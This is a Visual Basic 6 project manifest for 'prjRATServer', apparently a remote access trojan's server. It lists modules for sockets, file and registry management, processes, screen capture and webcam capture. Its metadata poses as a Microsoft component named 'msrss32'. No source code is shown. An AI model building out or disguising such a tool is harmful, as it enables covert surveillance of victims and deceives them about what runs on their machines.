Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\system32\stdole2.tlb#OLE Automation
Reference=*\G{E02AD29E-80F5-46C6-B416-9B3EBDDF057E}#1.0#0#C:\Program Files\Windows Live\Messenger\msnmsgr.exe\2#Messenger API Type Library
Form=frmMain.frm
Module=mdlFunction; mdlFunction.bas
Module=mdlProcess; mdlProcess.bas
Module=mdlWindow; mdlWindow.bas
Module=mdlProgram; mdlProgram.bas
Module=mdlService; mdlService.bas
Module=mdlFileManager; mdlFileManager.bas
Module=mdlRegistry; mdlRegistry.bas
Class=CSocketMaster; soketmaster\CSocketMaster.cls
Module=modSocketMaster; soketmaster\modSocketMaster.bas
UserControl=soketmaster\Socket.ctl
Module=mdlapiler; mdlapiler.bas
Module=mdlfunmanager; mdlfunmanager.bas
Form=frmscreen.frm
Module=ScreenCap; mdlscreenshot.bas
Module=mdlwebcam; mdlwebcam.bas
IconForm="frmMain"
Startup="frmMain"
HelpFile=""
Title="msrss32"
ExeName32="qwe.exe"
Path32="C:\Users\WHO\Desktop"
Command32=""
Name="prjRATServer"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="Microsoft"
CompilationType=-1
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1

[MS Transaction Server]
AutoRefresh=1
